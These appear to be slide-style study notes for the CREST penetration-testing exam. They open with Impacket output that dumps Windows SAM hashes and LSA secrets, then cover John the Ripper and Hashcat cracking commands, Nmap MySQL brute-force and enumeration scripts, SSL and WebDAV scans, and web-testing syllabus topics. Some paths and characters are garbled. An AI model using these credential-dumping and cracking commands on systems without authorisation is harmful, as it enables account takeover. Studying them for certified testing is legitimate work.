    Impacket v0.9.13 -Copyright 2002-2015 Core Security Technologies [*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:: : [*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain) [*] Dumping LSA Secrets [*] DPAPI_SYSTEM 0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y 0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So.... 0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...) [*] NL$KM 0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2 0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f......... 0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X 0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG [*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0 0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7. 0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3... 0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3. 0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@. 0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x. 0050 00 00 00 00 30 00 00 00 00 00 ....0..... [*] Cleaning up...  Obtain locally-stored clear-text password  Crack password hashes John the Ripper, Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker. It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute force attack first, then let the Rainbow Tables pick up the rest. SHA256 Hashing: kali# echo pearson | sha256sum 901….ba13 Windows password storage does not use salt so hashed passwords would look the same. Unlike in Linux, because of use of salting, if two users have same password then they will look different. NT password hashes will be mixed case, whereas LMHash will be all uppercase. John the Ripper John comes with its own dictionary at /usr/share/john/password.lst You can edit the file to add your own passwords, or use your own list using wordlist=/usr/share/john/file.lst. In the output, the username will be on the right-hand side and cracked password on the left. The number next to the username tells you which side of the password it is cracking for LMHASH which stores if password is greater than 8 characters it splits it into two and always make password upper case. So lowercase, password would be stored as PASSWOR and D. kali# john password-hashes.txt ACME201 (fireman:2)
  • 6.
    The below commandwill show all passwords that have been cracked: kali# john –show password-hashes.txt The hidden directory in home ./john stores the output files of .log, .pot, .rec Change the format to NT cracking (default is LMHASH) kali# john password-hashes.txt –-format=nt …and then have to specify format in show command: kali# john –show password-hashes.txt –format=nt Hashcat GPU (graphics card) support, so faster and works on Windows and is able to crack a large variety of hash formats. hashcat64.exe –potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3 The potfile is where the cracked passwords will be stored, the -m 3000 specifies the hash format being cracked, 3000 is for LMhash and 1000 is for NT Hash, the -a specifies brute force. To view the cracked passwords: hashcat64.exe –m 3000 –potfile-path cracked_passwords.pot password_hashes.txt –show --username Can use a dictionary attack: hashcat64.exe –potfile-path cracked_passwords.pot -m 3000 password_hashes.txt D:toolshatsrockyou.txt -r D;toolhashcat-3.6.0rulesInsidePro-PasswordsPro.rule The rule specifies various mangling rules.  Check patch levels – CREST Exam Notes; WMIC: wmic qfe list full /format:htable > hotfixes.htm Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering" get-hotfix Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security RH: rpm -qa --last  Derive list of missing security patches -  Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes and other computer problems.
  • 7.
    Appendix G: WebTechnologies G2 Web Servers & their Flaws Common web servers and their fundamental differences and vulnerabilities associated with them:  IIS – P372 Network Security Assessment  Apache (and variants) – P373 Network Security Assessment G4 Web Protocols Web protocols: HTTP, HTTPS, SOAP. All HTTP web methods and response codes.  See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16) HTTP Header Fields relating to security features  See Web App and Exam Notes G7 Web Application Servers Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403), Ruby on Rails (p409) and AJAX. Chapter 14, Network Security Assessment. AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html G8 Web APIs Application interfaces: CGI, ISAPI filters and Apache modules. G9 Web Sub-Components Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X. Flash Application Testing .Net Thick Clients Java Applets Decompilation of client-side code Base64 decoding? – Burp Decoder
  • 8.
    Appendix H: WebTesting Methodologies H3 Information Gathering from Web Mark-up Examples of the type of information available in web page source that may prove useful to an attacker:  Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.  Database Connection Strings  Credentials  Developer Comments  Other included files  Authenticated-only URLs H4 Authentication Mechanisms Common pitfalls associated with the design and implementation of application authentication mechanisms.  Useful p180, 2nd Edition H5 Authorisation Mechanisms Common pitfalls associated with the design and implementation of application authorisation mechanisms. H6 Input Validation The importance of input validation as part of a defensive coding strategy. How input validation can be implemented and the differences between white listing, black listing and data sanitisation. H7 Application Fuzzing Fuzzing and its relevance within web-app penetration testing. The use of fuzz strings and their potential effects. Potential dangers of fuzzing web applications. H9 Use of Cross Site Scripting Attacks Potential implications of a cross site scripting vulnerability. Ways in which the technique can be used to benefit an attacker. H10 Use of Injection Attacks Potential implications of injection vulnerabilities:  SQL injection  LDAP injection  Code injection  XML injection Ways in which these techniques can be used to benefit an attacker.
  • 9.
    H11 Session Handling Commonpitfalls associated with the design and implementation of session handling mechanisms. H12 Encryption Common techniques used for encrypting data in transit and data at rest, either on the client or server side. Identification and exploitation of Encoded values (e.g. Base64) and Identification and exploitation of Cryptographic values (e.g. MD5 hashes) Identification of common SSL vulnerabilities H13 Source Code Review Common techniques for identifying and reviewing deficiencies in the areas of security. ď‚· Useful table p164, 2nd Edition
  • 10.
    Appendix I: WebTesting Techniques I1 Web Site Structure Discovery Spidering tools and their relevance in a web application test for discovering linked content. Forced browsing techniques to discover default or unlinked content - Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto ď‚· Identification of functionality within client-side code I2 Cross Site Scripting Attacks Arbitrary JavaScript execution. Using Cross Site Scripting techniques to obtain sensitive information from other users. Phishing techniques. ď‚· See XSS I3 SQL Injection Determine the existence of an SQL injection condition in a web application. Determine the existence of a blind SQL injection condition in a web application. Exploit SQL injection to enumerate the database and its structure. Exploit SQL injection to execute commands on the target server. ď‚· See SQL injection I4 Session ID Attacks Investigate session handling within a web application. Harvest and analyse a number of session identifiers for weaknesses. ď‚· See Testing Session ID and Token Strength ď‚· Useful table p167 2nd Edition I5 Fuzzing The concept of fuzzing within a web application testing methodology. Common fuzzing tools. I6 Parameter Manipulation Parameter manipulation techniques, particularly the use of client-side proxies. I7 Data Confidentiality & Integrity Identifying weak (or missing) encryption. Identifying insecure SSL configurations.
  • 11.
    Identify insecure useof encoding techniques I8 Directory Traversal Identifying directory traversal vulnerabilities within applications.  See RFI and LFI, Path Transversal I9 File Uploads Identifying common vulnerabilities with file upload capabilities within applications.  See Uploads. I10 Code Injection Investigate and exploitation of code injection vulnerabilities within web applications  See OS command injection – get Commix working… I11 CRLF Attacks Assessment of web applications for CRLF vulnerabilities  See HTTP Testing – Headers I12 Application Logic Flaws Assessing the logic flow within an application and the potential for subverting the logic.
  • 12.
    Appendix J: Databases J1Microsoft SQL Server (p424) Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack techniques for a system compromised via database connections.  See CREST exam notes J2 Oracle RDBMS (p426) Derivation of version and patch information from hosts running Oracle software. Default Oracle accounts.  See CREST exam notes J3 Web / App / Database Connectivity Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods used by web applications  See CREST exam notes Useful Nmap Scripts MS SQL ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions include support for account lockout policies. MySQL nmap -p 3306 –script=”mysql-info” 127.0.0.1 - Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt. nmap -sV -sC <target> 3306/tcp open mysql | mysql-info: | Protocol: 10 | Version: 5.0.51a-3ubuntu5.1 | Thread ID: 7 | Capabilities flags: 40968 | Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth | Status: Autocommit |_ Salt: bYytNQ/4V6IN+*3`imj mysql-enum – Performs valid-user enumeration. Server version 5.x are susceptible to an user enumeration attack due to different messages during login when using old authentication mechanism from versions 4.x and earlier. mysql-brute – Basic brute force, can be run without word list. nmap --script=mysql-brute <target> 3306/tcp open mysql | mysql-brute: | Accounts | root:root - Valid credentials
  • 13.
    Additional Identification of morerecent SSL vulnerabilities – e.g. BEAST (page 318) ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and compressors that a server accepts. nmap -sV --script ssl-enum-ciphers -p 443 <host>  POODLE - We can deduce if a server is vulnerable to poodle if it supports SSLv3 protocol and uses CBC ciphers.  BEAST - Any server supporting SSLv3 OR TLS 1.0 and uses CBC ciphers. BEAST was indeed an attack on CBC mode with predictable (in fact known) IV in SSL3 and TLS1.0, because those protocols used the last block of the previous record, which (usually) has already been sent and seen by the adversary, as the IV for the next record. POODLE is not an attack on IV at all; it is a padding oracle attack on the padding used in SSL3 (and it turned out some debatably defective TLS1.0 implementations also), hence the acronym Padding Oracle on Downgraded Legacy Encryption Examples.txt HTTP Header Fields relating to security features – e.g. HSTS  See CREST Notes: HTTP Header Fields relating to security features  Useful p172, 2nd Edition Strict-Transport-Security.html Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing pattern matching in the response body. nmap --script http-webdav-scan -p80,8080 <target> Script Output PORT STATE SERVICE 8008/tcp open http | http-webdav-scan: | Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT | Server Type: DAV/0.9.8 Python/2.7.6 | Server Date: Fri, 22 May 2015 19:28:00 GMT | WebDAV type: Unknown | Directory Listing: | http://localhost | http://localhost:8008/WebDAVTest_b1tqTWeyRR | http://localhost:8008/WebDAVTest_A0QWJb7hcK | http://localhost:8008/WebDAVTest_hf9Mqqpi1M |_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
  • 14.
    Metasploit has afew modules to test for WebDAV presence. WebDAV.txt Decompilation of client-side code – e.g. Flash, Java, .Net Flash  Flash maintains its own cookie store that allows for cookies (that can’t be deleted directly from the browser).  ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which provides a similar sandbox environment to Java.  Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan24 can turn the bytecode back into ActionScript.  JPEXS Free Flash Decompiler  Perl Script – SWF-File-0.42 Java  Java code runs in two primary ways: either through standalone Java applications or through web applets. Applets are Java code specifically designed to run within a web page.  Java has a security model around the applets that tries to prevent them from calling malicious code. This model, also known as a sandbox.  A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a signed applet can execute code outside of the sandbox.  Actions like accessing the file system or executing operating system commands are blocked by default. The Java security model requires code to be trusted or permission to be given before accessing functionality that has security implications.  Java code is compiled into byte code resulting in a compiled class file and then proceed by the JVM.  Reversing Java using JD-GUI – page 391 .Net  JustDecompile Vulnerabilities in increasingly prevalent application frameworks – e.g. Rail (p409) Flash Application Testing Java Applets .Net Thick Clients Identification of functionality within client-side code that is accessible only to privileged users